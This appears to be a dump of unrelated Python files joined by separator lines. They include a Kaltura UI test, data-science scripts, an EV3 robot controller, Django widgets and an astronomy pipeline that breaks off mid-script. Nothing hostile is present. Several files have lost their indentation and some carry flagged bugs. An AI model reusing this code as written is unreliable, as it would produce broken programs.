from utilityTestFunc import *
import enums
class Test:
    """Kaltura MediaSpace UI test 2697: Watch History filtered by media type.

    Uploads one entry of each media type, plays each one so it appears in
    My History, then exercises the media-type filter (audio, video, quiz,
    image, all) and verifies both the listed entries and their type icons.
    """
    #================================================================================================================================
    # @Author: Inbar Willman
    # Test Name: Watch History - Filter by media type
    # The test's Flow:
    # Login to KMS-> Upload entries from all types -> Go to entry page and play entry -> Go to
    # My History page and filter entries by media type - video
    # test cleanup: deleting the uploaded file
    #================================================================================================================================
    testNum = "2697"
    supported_platforms = clsTestService.updatePlatforms(testNum)
    status = "Pass"
    timeout_accured = "False"
    driver = None
    common = None
    # Test variables
    entryDescription = "description"
    entryTags = "tag1,"
    QuizQuestion1 = 'First question'
    QuizQuestion1Answer1 = 'First answer'
    QuizQuestion1AdditionalAnswers = ['Second answer', 'Third question', 'Fourth question']
    questionNumber = 1
    # Local media fixtures (quiz reuses the same clip as the plain video).
    filePathVideo = localSettings.LOCAL_SETTINGS_MEDIA_PATH + r'\videos\QR30SecMidRight.mp4'
    filePathQuiz = localSettings.LOCAL_SETTINGS_MEDIA_PATH + r'\videos\QR30SecMidRight.mp4'
    filePathAudio = localSettings.LOCAL_SETTINGS_MEDIA_PATH + r'\Audios\audio.mp3'
    filePathImage = localSettings.LOCAL_SETTINGS_MEDIA_PATH + r'\images\AutomatedBenefits.jpg'
    #run test as different instances on all the supported platforms
    @pytest.fixture(scope='module',params=supported_platforms)
    def driverFix(self,request):
        return request.param
    def test_01(self,driverFix,env):
        try:
            logStartTest(self,driverFix)
            ############################# TEST SETUP ###############################
            #capture test start time
            self.startTime = time.time()
            #initialize all the basic vars and start playing
            # NOTE(review): this tuple-unpack rebinds the local name 'self'
            # with the value returned by the framework -- framework pattern,
            # but worth confirming it is intentional.
            self,self.driver = clsTestService.initializeAndLoginAsUser(self, driverFix)
            self.common = Common(self.driver)
            ########################################################################
            # Unique (GUID-prefixed) entry names, one per media type.
            self.entryAudio = clsTestService.addGuidToString('audioType', self.testNum)
            self.entryVideo = clsTestService.addGuidToString('videoType', self.testNum)
            self.entryQuiz = clsTestService.addGuidToString('quizType', self.testNum)
            self.entryImage = clsTestService.addGuidToString('imageType', self.testNum)
            self.entriesToDelete = [self.entryAudio, self.entryVideo, self.entryQuiz + " - Quiz" , self.entryImage]
            self.entriesToUpload = {
                self.entryAudio: self.filePathAudio,
                self.entryVideo: self.filePathVideo,
                self.entryQuiz: self.filePathQuiz,
                self.entryImage: self.filePathImage
            }
            # Expected visibility of each entry under each media-type filter.
            self.filterByImage = {self.entryAudio: False, self.entryVideo: False, self.entryQuiz + " - Quiz": False,self.entryImage: True}
            self.filterByAudio = {self.entryAudio: True, self.entryVideo: False, self.entryQuiz + " - Quiz": False, self.entryImage: False}
            self.filterByVideo = {self.entryAudio: False, self.entryVideo: True, self.entryQuiz + " - Quiz": False, self.entryImage: False}
            self.filterByQuiz = {self.entryAudio: False, self.entryVideo: False, self.entryQuiz + " - Quiz": True, self.entryImage: False}
            self.filterByAllMedia = {self.entryAudio: True, self.entryVideo: True, self.entryQuiz + " - Quiz": True, self.entryImage: True}
            # self.filterByImage = {'CCCAE781-2697-audioType': False, 'CCCAE781-2697-videoType': False, 'CCCAE781-2697-quizType - Quiz': False,'CCCAE781-2697-imageType': True}
            # self.filterByAudio = {'CCCAE781-2697-audioType': True, 'CCCAE781-2697-videoType': False, 'CCCAE781-2697-quizType - Quiz': False, 'CCCAE781-2697-imageType': False}
            # self.filterByVideo = {'CCCAE781-2697-audioType': False, 'CCCAE781-2697-videoType': True, 'CCCAE781-2697-quizType - Quiz': False, 'CCCAE781-2697-imageType': False}
            # self.filterByQuiz = {'CCCAE781-2697-audioType': False, 'CCCAE781-2697-videoType': False, 'CCCAE781-2697-quizType - Quiz': True, 'CCCAE781-2697-imageType': False}
            # self.filterByAllMedia = {'CCCAE781-2697-audioType': True, 'CCCAE781-2697-videoType': True, 'CCCAE781-2697-quizType - Quiz': True, 'CCCAE781-2697-imageType': True}
            ########################## TEST STEPS - MAIN FLOW #######################
            writeToLog("INFO","Step 1: Going to upload entries")
            if self.common.upload.uploadEntries(self.entriesToUpload, self.entryDescription, self.entryTags) == False:
                self.status = "Fail"
                writeToLog("INFO","Step 1: FAILED to upload entry")
                return
            writeToLog("INFO","Step 2: Going to navigate to uploaded entry page")
            if self.common.entryPage.navigateToEntry(self.entryQuiz) == False:
                self.status = "Fail"
                writeToLog("INFO","Step 2: FAILED to navigate to entry page")
                return
            writeToLog("INFO","Step 3: Going to wait until media will finish processing")
            if self.common.entryPage.waitTillMediaIsBeingProcessed() == False:
                self.status = "Fail"
                writeToLog("INFO","Step 3: FAILED - New entry is still processing")
                return
            writeToLog("INFO","Step 4: Going to navigate to add new video quiz")
            if self.common.upload.addNewVideoQuiz() == False:
                self.status = "Fail"
                writeToLog("INFO","Step 4: FAILED to click video quiz")
                return
            writeToLog("INFO","Step 5: Going to search the uploaded entry and open KEA")
            if self.common.kea.searchAndSelectEntryInMediaSelection(self.entryQuiz, False) == False:
                self.status = "Fail"
                writeToLog("INFO","Step 5: FAILED to find entry and open KEA")
                return
            writeToLog("INFO","Step 6: Going to start quiz and add questions")
            if self.common.kea.addQuizQuestion(self.QuizQuestion1, self.QuizQuestion1Answer1, self.QuizQuestion1AdditionalAnswers) == False:
                self.status = "Fail"
                writeToLog("INFO","Step 6: FAILED to start quiz and add questions")
                return
            writeToLog("INFO","Step 7: Going to save quiz and navigate to media page")
            if self.common.kea.clickDone() == False:
                self.status = "Fail"
                writeToLog("INFO","Step 7: FAILED to save quiz and navigate to media page")
                return
            # Play each entry once so it is recorded in Watch History.
            writeToLog("INFO","Step 8: Going to play quiz entry")
            if self.common.player.navigateToQuizEntryAndClickPlay(self.entryQuiz + " - Quiz", self.questionNumber) == False:
                self.status = "Fail"
                writeToLog("INFO","Step 8: FAILED to navigate and play entry")
                return
            writeToLog("INFO","Step 9: Going to switch to default content")
            if self.common.base.switch_to_default_content() == False:
                self.status = "Fail"
                writeToLog("INFO","Step 9: FAILED to switch to default content")
                return
            writeToLog("INFO","Step 10: Going to play audio entry")
            if self.common.player.navigateToEntryClickPlayPause(self.entryAudio, '0:05', toVerify=False, timeout=50) == False:
                self.status = "Fail"
                writeToLog("INFO","Step 10: FAILED to navigate and play audio entry")
                return
            writeToLog("INFO","Step 9: Going to switch to default content")
            if self.common.base.switch_to_default_content() == False:
                self.status = "Fail"
                writeToLog("INFO","Step 9: FAILED to switch to default content")
                return
            writeToLog("INFO","Step 11: Going to play video entry")
            if self.common.player.navigateToEntryClickPlayPause(self.entryVideo, '0:05') == False:
                self.status = "Fail"
                writeToLog("INFO","Step 11: FAILED to navigate and play video entry")
                return
            writeToLog("INFO","Step 9: Going to switch to default content")
            if self.common.base.switch_to_default_content() == False:
                self.status = "Fail"
                writeToLog("INFO","Step 9: FAILED to switch to default content")
                return
            writeToLog("INFO","Step 12: Going to 'play' image entry")
            if self.common.entryPage.navigateToEntry(self.entryImage) == False:
                self.status = "Fail"
                writeToLog("INFO","Step 12: FAILED to navigate and 'play' image entry")
                return
            writeToLog("INFO","Step 13: Going to navigate to history page")
            if self.common.myHistory.navigateToMyHistory(True) == False:
                self.status = "Fail"
                writeToLog("INFO","Step 12: FAILED to navigate to history page")
                return
            # Exercise every media-type filter and verify entries + icons.
            writeToLog("INFO","Step 14: Going to filter entries by media type audio")
            if self.common.myHistory.filterInMyHistory(dropDownListName = enums.MyHistoryFilters.MEDIA_TYPE, dropDownListItem = enums.MediaType.AUDIO) == False:
                self.status = "Fail"
                writeToLog("INFO","Step 14: FAILED to filter entries by media type audio")
                return
            writeToLog("INFO","Step 15: Going to check that correct entries for audio filter are displayed")
            if self.common.myHistory.verifyFiltersInMyHistory(self.filterByAudio) == False:
                self.status = "Fail"
                writeToLog("INFO","Step 15: FAILED to displayed correct entries for audio type")
                return
            writeToLog("INFO","Step 16: Going to verify that only entries with " + enums.MediaType.AUDIO.value + " icon display")
            if self.common.myMedia.verifyEntryTypeIcon([self.entryAudio], enums.MediaType.AUDIO) == False:
                self.status = "Fail"
                writeToLog("INFO","Step 16: FAILED to filter and verify my media entries by '" + enums.MediaType.AUDIO.value + "'")
                return
            writeToLog("INFO","Step 17: Going to filter entries by media video audio")
            if self.common.myHistory.filterInMyHistory(dropDownListName = enums.MyHistoryFilters.MEDIA_TYPE, dropDownListItem = enums.MediaType.VIDEO) == False:
                self.status = "Fail"
                writeToLog("INFO","Step 17: FAILED to filter entries by media type video")
                return
            writeToLog("INFO","Step 18: Going to check that correct entries for video filter are displayed")
            if self.common.myHistory.verifyFiltersInMyHistory(self.filterByVideo) == False:
                self.status = "Fail"
                writeToLog("INFO","Step 18: FAILED to displayed correct entries for video type")
                return
            writeToLog("INFO","Step 19: Going to verify that only entries with " + enums.MediaType.VIDEO.value + " icon display")
            if self.common.myMedia.verifyEntryTypeIcon([self.entryVideo], enums.MediaType.VIDEO) == False:
                self.status = "Fail"
                writeToLog("INFO","Step 19: FAILED to filter and verify my media entries by '" + enums.MediaType.VIDEO.value + "'")
                return
            writeToLog("INFO","Step 20: Going to filter entries by media type quiz")
            if self.common.myHistory.filterInMyHistory(dropDownListName = enums.MyHistoryFilters.MEDIA_TYPE, dropDownListItem = enums.MediaType.QUIZ) == False:
                self.status = "Fail"
                writeToLog("INFO","Step 20: FAILED to filter entries by media type quiz")
                return
            writeToLog("INFO","Step 21: Going to check that correct entries for quiz filter are displayed")
            if self.common.myHistory.verifyFiltersInMyHistory(self.filterByQuiz) == False:
                self.status = "Fail"
                writeToLog("INFO","Step 21: FAILED to displayed correct entries for quiz type")
                return
            writeToLog("INFO","Step 22: Going to verify that only entries with " + enums.MediaType.QUIZ.value + " icon display")
            if self.common.myMedia.verifyEntryTypeIcon([self.entryQuiz + " - Quiz"], enums.MediaType.QUIZ) == False:
                self.status = "Fail"
                writeToLog("INFO","Step 22: FAILED to filter and verify my media entries by '" + enums.MediaType.QUIZ.value + "'")
                return
            writeToLog("INFO","Step 23: Going to filter entries by media type audio")
            if self.common.myHistory.filterInMyHistory(dropDownListName = enums.MyHistoryFilters.MEDIA_TYPE, dropDownListItem = enums.MediaType.IMAGE) == False:
                self.status = "Fail"
                writeToLog("INFO","Step 23: FAILED to filter entries by media type audio")
                return
            writeToLog("INFO","Step 24: Going to check that correct entries for image filter are displayed")
            if self.common.myHistory.verifyFiltersInMyHistory(self.filterByImage) == False:
                self.status = "Fail"
                writeToLog("INFO","Step 24: FAILED to displayed correct entries for image type")
                return
            writeToLog("INFO","Step 25: Going to verify that only entries with " + enums.MediaType.IMAGE.value + " icon display")
            if self.common.myMedia.verifyEntryTypeIcon([self.entryImage], enums.MediaType.IMAGE) == False:
                self.status = "Fail"
                writeToLog("INFO","Step 25: FAILED to filter and verify my media entries by '" + enums.MediaType.IMAGE.value + "'")
                return
            writeToLog("INFO","Step 26: Going to filter entries by media type audio")
            if self.common.myHistory.filterInMyHistory(dropDownListName = enums.MyHistoryFilters.MEDIA_TYPE, dropDownListItem = enums.MediaType.ALL_MEDIA) == False:
                self.status = "Fail"
                writeToLog("INFO","Step 26: FAILED to filter entries by media type audio")
                return
            writeToLog("INFO","Step 27: Going to check that correct entries for all media filter are displayed")
            # NOTE(review): this step calls verifyFiltersInMyMedia while all
            # earlier verifications use verifyFiltersInMyHistory -- confirm
            # this is intentional.
            if self.common.myHistory.verifyFiltersInMyMedia(self.filterByAllMedia) == False:
                self.status = "Fail"
                writeToLog("INFO","Step 27: FAILED to displayed correct entries for all media type")
                return
            #########################################################################
            writeToLog("INFO","TEST PASSED")
        # If an exception happened we need to handle it and fail the test
        except Exception as inst:
            self.status = clsTestService.handleException(self,inst,self.startTime)
    ########################### TEST TEARDOWN ###########################
    def teardown_method(self,method):
        # Best-effort cleanup: delete uploaded entries, then assert outcome.
        try:
            self.common.handleTestFail(self.status)
            writeToLog("INFO","**************** Starting: teardown_method **************** ")
            self.common.base.switch_to_default_content()
            self.common.myMedia.deleteEntriesFromMyMedia(self.entriesToDelete)
            writeToLog("INFO","**************** Ended: teardown_method *******************")
        except:
            pass
        clsTestService.basicTearDown(self)
        #write to log we finished the test
        logFinishedTest(self,self.startTime)
        assert (self.status == "Pass")
    pytest.main('test_' + testNum + '.py --tb=line')
|
# -*- coding: utf-8 -*-
"""
Spyder Editor
This temporary script file is located here:
C:\Users\Standard User\.spyder2\.temp.py
"""
# Load Kaggle-style train/test CSVs and coerce selected fields to numeric
# types (ints, floats, and created_time to a Unix timestamp).
# NOTE(review): this is Python 2 code (print statement, 'rb' text mode for
# csv); it will not run unchanged under Python 3.
import numpy as np
import csv
import time
from sklearn import cross_validation
from sklearn.metrics import make_scorer
traindata = []
file_name = "C:/Users/Standard User/Downloads/train.csv"
reader = csv.DictReader(open(file_name, 'rb'), delimiter=',', quotechar='"')
for row in reader:
    traindata.append(row)
# Coerce string fields of each training record to their proper types.
for sub in traindata:
    for key in sub:
        if key == 'id' or key == 'num_votes' or key == 'num_comments' or key == 'num_views':
            sub[key] = int(sub[key])
        elif key == 'latitude' or key =='longitude':
            sub[key] = float(sub[key])
        elif key == 'created_time':
            sub[key] = time.mktime(time.strptime(sub[key], "%Y-%m-%d %H:%M:%S")) # make time into datetime (float)
testdata = []
file_name = "C:/Users/Standard User/Downloads/test.csv"
reader = csv.DictReader(open(file_name, 'rb'), delimiter=',', quotechar='"')
for row in reader:
    testdata.append(row)
# Same coercion for the test records.
for sub in testdata:
    for key in sub:
        if key == 'id' or key == 'num_votes' or key == 'num_comments' or key == 'num_views':
            sub[key] = int(sub[key])
        elif key == 'latitude' or key =='longitude':
            sub[key] = float(sub[key])
        elif key == 'created_time':
            sub[key] = time.mktime(time.strptime(sub[key], "%Y-%m-%d %H:%M:%S"))
# NOTE(review): 'id' here is the Python builtin function, so testdata[id]
# raises TypeError; probably a debug line meant to print one record
# (e.g. testdata[0]) -- confirm intent before fixing.
print testdata[id]
|
#!/usr/bin/env python
"""
Single script for computing spearman correlation between different models
and the compositionality ratings.
"""
import sys
import argparse
from os.path import basename
from numbers import Number
import pandas as pd
from util import openfile, df_remove_pos, read_vector_file
from distances import cosine, calculate_distance_metrics as cdm
from matrix import norm2_matrix
DISTANCE_METRIC = cosine
def numeric_columns(dataframe):
    """Return the columns of *dataframe* whose first entry is numeric."""
    selected = []
    for label in dataframe.columns:
        column = dataframe[label]
        if isinstance(column[0], Number):
            selected.append(column)
    return selected
def pairs(lst):
    """Yield every unordered pair (x, y) with x appearing before y in *lst*."""
    for i in range(len(lst)):
        for j in range(i + 1, len(lst)):
            yield lst[i], lst[j]
def correlations(dataframe):
    """Spearman rho and p-value for every pair of numeric columns.

    Returns a DataFrame with columns (col1, col2, rho, p).
    """
    from scipy.stats import spearmanr
    rows = []
    for left, right in pairs(list(numeric_columns(dataframe))):
        rho, p = spearmanr(left, right)
        rows.append({"col1": left.name, "col2": right.name, "rho": rho, "p": p})
    return pd.DataFrame(rows, columns=("col1", "col2", "rho", "p"))
def scatters(dataframe, filename):
    """Write a scatter plot for every numeric column pair to a PDF file."""
    from matplotlib import pyplot as plt
    from matplotlib.backends.backend_pdf import PdfPages
    pdf = PdfPages(filename)
    plt.locator_params(tight=True)
    for col1, col2 in pairs(list(numeric_columns(dataframe))):
        plt.plot(col1, col2, 'o')
        # pad each axis by 5% of the column's range
        pad_x = 0.05 * (col1.max() - col1.min())
        pad_y = 0.05 * (col2.max() - col2.min())
        plt.axis([col1.min() - pad_x, col1.max() + pad_x,
                  col2.min() - pad_y, col2.max() + pad_y])
        plt.xlabel(col1.name)
        plt.ylabel(col2.name)
        pdf.savefig()
        plt.clf()
    pdf.close()
def main():
parser = argparse.ArgumentParser(
description='Computes correlations with compositionality ratings.')
parser.add_argument('--input', '-i', action="append", type=openfile,
metavar="FILE", help='Input vector space.')
parser.add_argument('--ratings', '-r', metavar='COMPFILE', type=openfile,
help='The compositionality ratings file.')
parser.add_argument('--self', '-s', action="store_true",
help='Whether we should include self-comp ratings.')
parser.add_argument('--no-tsv', '-T', action="store_true",
help="*Don't* output the TSV containing comp and model ratings.")
parser.add_argument('--corrs', '-c', action="store_true",
help='Specifies whether correlations should be computed and outputed.')
parser.add_argument('--pdf', '-p', metavar="FILE", default=None,
help='Output plots as a PDF to the given filename.')
args = parser.parse_args()
compratings = pd.read_table(args.ratings)
if not args.self:
compratings = compratings[compratings["compound"] != compratings["const"]]
word_pairs = set(zip(compratings['compound'], compratings['const']))
named_vector_spaces = [
(basename(f.name), norm2_matrix(df_remove_pos(read_vector_file(f))))
for f in args.input
]
if len(named_vector_spaces) > 1:
# need to do concatenation
names, vses = zip(*named_vector_spaces)
concat_space = pd.concat(vses, keys=names)
named_vector_spaces.append(("<concat>", concat_space))
# compute all the distances AND keep the different measures independently named
distances = [
cdm(vs, word_pairs, [DISTANCE_METRIC])
.rename(columns={DISTANCE_METRIC.name: fn + ":" + DISTANCE_METRIC.name})
for fn, vs in named_vector_spaces
]
# now we need to join all the distance calculations:
joined_measures = reduce(pd.merge, distances).rename(
columns={"left": "compound", "right": "const"})
# finally join the similarity measures with the human ratings
dm_and_comp = pd.merge(compratings, joined_measures)
# output dm_and_comp unless the user specified not to
if not args.no_tsv:
dm_and_comp.to_csv(sys.stdout, index=False, sep="\t")
# nicer output
if not args.no_tsv and args.corrs:
# let's compute our correlations
print "\n" + "-" * 80 + "\n"
# compute and output correlations if the user asked
if args.corrs:
corrs = correlations(dm_and_comp).to_csv(sys.stdout, index=False, sep="\t")
# plot the measures if the user asked.
if args.pdf:
scatters(dm_and_comp, args.pdf)
# Script entry point.
if __name__ == '__main__':
main()
|
#!/usr/bin/env python3
# Import the EV3-robot library
import ev3dev.ev3 as ev3
from time import sleep
# Constructor
# Shared EV3 button handle used by run() and pause().
btn = ev3.Button()
# NOTE(review): run() binds its own local shut_down; this global is never read.
shut_down = False
# Main method
def run():
# sensors
cs = ev3.ColorSensor('in2'); assert cs.connected # measures light intensity
shut_down = False
cs.mode = 'COL-REFLECT' # measure light intensity
# motors
lm = ev3.LargeMotor('outB'); assert lm.connected # left motor
rm = ev3.LargeMotor('outC'); assert rm.connected # right motor
mm = ev3.MediumMotor('outD'); assert mm.connected # medium motor
speed = 360/4 # deg/sec, [-1000, 1000]
dt = 500 # milliseconds
stop_action = "coast"
# PID tuning
Kp = 1 # proportional gain
Ki = 0 # integral gain
Kd = 0 # derivative gain
integral = 0
previous_error = 0
# initial measurment
target_value = cs.value()
# Start the main loop
while not shut_down:
# deal with obstacles
# Calculate steering using PID algorithm
error = target_value - cs.value()
integral += (error * dt)
derivative = (error - previous_error) / dt
# u zero: on target, drive forward
# u positive: too bright, turn right
# u negative: too dark, turn left
u = (Kp * error) + (Ki * integral) + (Kd * derivative)
# limit u to safe values: [-1000, 1000] deg/sec
if speed + abs(u) > 1000:
if u >= 0:
u = 1000 - speed
else:
u = speed - 1000
# run motors
if u >= 0:
lm.run_timed(time_sp=dt, speed_sp=speed + u, stop_action=stop_action)
rm.run_timed(time_sp=dt, speed_sp=speed - u, stop_action=stop_action)
sleep(dt / 1000)
else:
lm.run_timed(time_sp=dt, speed_sp=speed - u, stop_action=stop_action)
rm.run_timed(time_sp=dt, speed_sp=speed + u, stop_action=stop_action)
sleep(dt / 1000)
previous_error = error
# Check if buttons pressed (for pause or stop)
if btn.down: # Stop
print("Exit program... ")
shut_down = True
elif not btn.left: # Pause
print("[Pause]")
pause()
# 'Pause' method
def pause(pct=0.0, adj=0.01):
    """Pulse both LEDs amber while a side button is held, then restore green.

    pct is the starting brightness, adj the per-iteration step; the step
    direction flips whenever the next value would leave [0.0, 1.0].
    """
    while btn.right or btn.left:
        for side in (ev3.Leds.LEFT, ev3.Leds.RIGHT):
            ev3.Leds.set_color(side, ev3.Leds.AMBER, pct)
        if not 0.0 <= (pct + adj) <= 1.0:
            adj = -adj
        pct += adj
    print("[Continue]")
    for side in (ev3.Leds.LEFT, ev3.Leds.RIGHT):
        ev3.Leds.set_color(side, ev3.Leds.GREEN)
# Main function
#if __name__ == "__main__":
# NOTE(review): the entry guard above is commented out, so run() also
# executes when this module is imported.
run()
|
#!/usr/bin/python
"""
This is the code to accompany the Lesson 1 (Naive Bayes) mini-project.
Use a Naive Bayes Classifier to identify emails by their authors
authors and labels:
Sara has label 0
Chris has label 1
"""
import sys
from time import time
sys.path.append("../tools/")
from email_preprocess import preprocess
from sklearn.naive_bayes import GaussianNB
from sklearn.metrics import accuracy_score
from datetime import datetime
### features_train and features_test are the features for the training
### and testing datasets, respectively
### labels_train and labels_test are the corresponding item labels
features_train, features_test, labels_train, labels_test = preprocess()
#########################################################
### your code goes here ###
#########################################################
# we need to find out the elapsed time as well
start = datetime.now()
# create a Classifier
clf = GaussianNB()
# fit (ie train) the model
clf.fit(features_train, labels_train)
print "Model Trained !"
# predict using the trained model now
predicted = clf.predict(features_test)
print "Predicted !"
end = datetime.now()
print "Elapsed time = "+str(end-start)
print "Accuracy = "+str(accuracy_score(predicted, labels_test))
|
# from django.db.models.fields.files import FieldFile
from django.forms import widgets
from django.forms.widgets import ClearableFileInput, CheckboxInput, FILE_INPUT_CONTRADICTION
from django.utils.html import escape, conditional_escape
from django.utils.safestring import mark_safe
from sorl.thumbnail import get_thumbnail
from sorl.thumbnail.fields import ImageField, ImageFormField
from common.utils import image_from_url_get_2
#class ExTextInput(TextInput):
# def render(self, name, value, attrs=None):
# if value is None:
# value = ''
# final_attrs = self.build_attrs(attrs, type=self.input_type, name=name)
# if value != '':
# # Only add the 'value' attribute if a value is non-empty.
# final_attrs['value'] = force_unicode(self._format_value(value))
# return mark_safe(u'<input style="width:250" %s />' % flatatt(final_attrs))
class ExClearableFileInput(ClearableFileInput):
template_with_initial = u'''<span class="ex-image-form-field">
<span class="block-initial">%(initial)s %(clear_template)s</span>
<span class="block-inputs">%(input_text)s: %(input)s</span>
</span>'''
template_with_clear = u''' %(clear)s %(clear_checkbox_label)s'''
def image_url_name(self, name):
return '%s-image-url' % name
def render(self, name, value, attrs = None):
substitutions = {
'initial_text': self.initial_text,
'input_text': self.input_text,
'clear_template': '',
'clear_checkbox_label': self.clear_checkbox_label,
}
template = u'%(input)s or url: %(input_img_url)s'
substitutions['input'] = super(ClearableFileInput, self).render(name, value, attrs)
substitutions['input_img_url'] = widgets.TextInput(attrs = {'style' : 'width:320px'}).render(conditional_escape(self.image_url_name(name)), '')
if value and hasattr(value, "url"):
template = self.template_with_initial
# substitutions['initial'] = (u'<a href="%s">%s</a>'
# % (escape(value.url),
try:
from django.conf import settings
# img_url = get_thumbnail('%s/../%s' % (settings.PROJECT_ROOT, value.url), '140x140', crop = 'center top').url
img_url = get_thumbnail('%s/../%s' % (settings.PROJECT_ROOT, value.url), '140x140').url
substitutions['initial'] = (u'<a href="%s" class="image-href"><img class="image" src="%s" width="140"/></a>'
% (escape(value.url),
escape(img_url)))
except BaseException, e:
substitutions['initial'] = (u'<a href="%s" class="image-href"><img class="image" src="%s" width="140"/></a>'
% (escape(value.url),
escape(value.url)))
if not self.is_required:
checkbox_name = self.clear_checkbox_name(name)
checkbox_id = self.clear_checkbox_id(checkbox_name)
substitutions['clear_checkbox_name'] = conditional_escape(checkbox_name)
substitutions['clear_checkbox_id'] = conditional_escape(checkbox_id)
# substitutions['img_url_name'] = conditional_escape(checkbox_id)
substitutions['clear'] = CheckboxInput().render(checkbox_name, False, attrs={'id': checkbox_id})
substitutions['clear_template'] = self.template_with_clear % substitutions
return mark_safe(template % substitutions)
def value_from_datadict(self, data, files, name):
upload = super(ClearableFileInput, self).value_from_datadict(data, files, name)
# InMemoryUploadedFile
image_url = widgets.TextInput().value_from_datadict(data, files, self.image_url_name(name))
if not upload and image_url:
try:
upload = image_from_url_get_2(image_url)
except BaseException,e:
uplod = ''
if not self.is_required and CheckboxInput().value_from_datadict(
data, files, self.clear_checkbox_name(name)):
if upload:
# If the user contradicts themselves (uploads a new file AND
# checks the "clear" checkbox), we return a unique marker
# object that FileField will turn into a ValidationError.
return FILE_INPUT_CONTRADICTION
# False signals to clear any existing value, as opposed to just None
return False
return upload
# Form field pairing sorl's ImageFormField with the thumbnail-preview widget.
class ExImageFormField(ImageFormField):
widget = ExClearableFileInput
#class ExFieldFile(FieldFile):
# def __unicode__(self):
# if hasattr(self, 'url'):
# try:
# from django.conf import settings
# img_url = get_thumbnail('%s/../%s' % (settings.PROJECT_ROOT, self.url), '140x140').url
# return mark_safe('<img url="%s"/>' % img_url)
# except BaseException, e:
# return self.url
# return ''
class ExImageField(ImageField):
    """sorl ImageField whose form field defaults to ExImageFormField."""
    def formfield(self, **kwargs):
        # Callers may still override form_class explicitly via kwargs.
        kwargs.setdefault('form_class', ExImageFormField)
        return super(ExImageField, self).formfield(**kwargs)
# ModelAdmin mixin: renders ExImageField with the thumbnail widget and pulls
# in the supporting stylesheet.
class AdminExImageFieldMixin(object):
formfield_overrides = {
ExImageField: {'widget': ExClearableFileInput},
}
class Media:
css = {
'all': ['/static/css/ex_widgets.css']
}
|
#!/usr/bin/env python
from distutils.core import setup, Extension
from Cython.Build import cythonize

# C++11 extension combining the Cython wrapper with the native gain code.
smatch_extension = Extension(
    "_smatch",
    sources=["_smatch.pyx", "_gain.cc"],
    language="c++",
    extra_compile_args=["-std=c++11"],
)

setup(ext_modules=cythonize(smatch_extension))
|
# LMS portal credentials.
# SECURITY NOTE(review): these look like committed placeholders -- load real
# credentials from the environment or a secrets store, never from source.
login = {
'user': 'user',
'password': 'password'
}
# Destination folder for downloaded files.
directory = '/Users/usmankhan/Desktop'
# Login page plus the icon URLs used to recognise each resource type.
resources = {
'url': 'https://lms.nust.edu.pk/portal/login/index.php',
'powerpoint': 'https://lms.nust.edu.pk/portal/theme/image.php/nust/core/1464680422/f/powerpoint-24',
'pdf': 'https://lms.nust.edu.pk/portal/theme/image.php/nust/core/1464680422/f/pdf-24',
'word': 'https://lms.nust.edu.pk/portal/theme/image.php/nust/core/1464680422/f/document-24'
}
|
import sys
class BaseObject(object):
    """BaseObject"""

    def __init__(self):
        # Characters trimmed from every token produced by str_to_list().
        self.strip_chars = ' \r\n\t/"\',\\'

    @staticmethod
    def convert_boole(target):
        """Coerce a True/False-like value to a real bool; exit otherwise."""
        normalized = str(target).lower()
        if normalized not in ('true', 'false'):
            error_message = 'Error: The expected input for {0} should be: True or False'.format(normalized)
            sys.exit(error_message)
        return normalized == 'true'

    def validate_str(self, target, ignore_exception=False, target_name=None):
        """Function: validate_string
        :param target: the target value
        :param ignore_exception: the True or False
        :param target_name: the target name
        :return True/False whether target is a string, None for None-like input
        """
        if target is None or str(target).lower() == 'none':
            return
        target_type = type(target)
        ignore_exception = self.convert_boole(ignore_exception)
        try:
            # Python 2 accepts both str and unicode; Python 3 has no unicode.
            string_type = target_type is str or target_type is unicode
        except NameError:
            string_type = target_type is str
        if not string_type and not ignore_exception:
            if target_name:
                error_message = 'Error: The {0} - {1} is not string type. Please check.'.format(target_name, target)
            else:
                error_message = 'Error: The {0} is not string type. Please check.'.format(target)
            sys.exit(error_message)
        return string_type

    def str_to_list(self, string, delimiter=',', lower=False):
        """Function: str_to_list
        :param string: the string
        :param delimiter: the delimiter for list (default comma)
        :param lower: lower the string (default False)
        :return list of stripped (optionally lowered) tokens
        """
        if string is None or str(string).lower() == 'none':
            return []
        source_type = type(string)
        error_message = 'Error: The string should be list or string, use comma to separate. ' \
                        'Current is: type-{0}, {1}'.format(source_type, string)
        # Objects whose truth value is ambiguous (e.g. arrays) are rejected.
        try:
            bool(string)
        except ValueError:
            sys.exit(error_message)
        # Dispatch on the input type.
        if source_type in (list, tuple):
            items = [str(entry).strip(self.strip_chars) for entry in string]
        elif self.validate_str(string, True):
            items = [entry.strip(self.strip_chars)
                     for entry in string.strip(self.strip_chars).split(delimiter)]
        elif not string:
            return list()
        else:
            sys.exit(error_message)
        if lower:
            items = [entry.lower() for entry in items]
        return items
|
# postcodes generator
# TASK: takes 2 strings: '67-600' and '82-900' and returns a list of codes between
def main():
    """Demo: collect postcodes between the two bounds x and y."""
    x = '67-600'
    y = '82-900'
    codes = [x, y]

    def add_new(code):
        """Insert *code* just before the upper bound y.

        BUG FIX: the original computed the insertion index once from the
        initial length (always index 1), so each new code was pushed right
        after x and the inserted codes came out in reverse order.
        Recomputing len(codes) on every call preserves insertion order.
        """
        return codes.insert(len(codes) - 1, code)

    # below examples
    for sample in ('79-901', '45-444', '45-443', '88-443',
                   '45-423', '11-111', '22-222'):
        add_new(sample)
        print(codes)


if __name__ == '__main__':
    main()
|
import os
import numpy as np
from astropy.io import fits, ascii
from astropy.table import Column
import sdss_psf
from pyraf import iraf
import zeropoints
# Load the IRAF packages providing the fuzzy / GIM2D tasks used downstream.
iraf.fuzzy()
iraf.gim2d()
# SExtractor configuration file for the HST imaging.
hst_config = '/mnt/hd3/cosmos/hst_default.sex'
# CHANGE THIS TO HST IMAGE DIRECTORY
img_path = '/mnt/hd3/cosmos/ACS/'
psf_file = '/mnt/hd3/cosmos/cosmos_3dhst_v4.0_acs_psf/cosmos_3dhst.v4.0.F814W_psf.fits'
# CHANGE THIS STUFF FOR HST
# Science frames acs_I_*sci.fits plus their rms maps ('sci' -> 'rms').
imgfiles = [os.path.join(img_path,x) for x in sorted(os.listdir(img_path)) if x.startswith('acs_I_')&x.endswith('sci.fits')]
rmsfiles = [os.path.join(img_path,x.replace('sci','rms')) for x in imgfiles]
for i in range(len(imgfiles)):
print os.path.split(imgfiles[i])[-1]
# Run Source Extractor on image
catname = os.path.split(imgfiles[i])[-1].replace('.fits','.gfxt')
segname = os.path.split(imgfiles[i])[-1].replace('.fits','_seg.fits')
# Shell command built in three pieces: inputs/config, weighting, formatting.
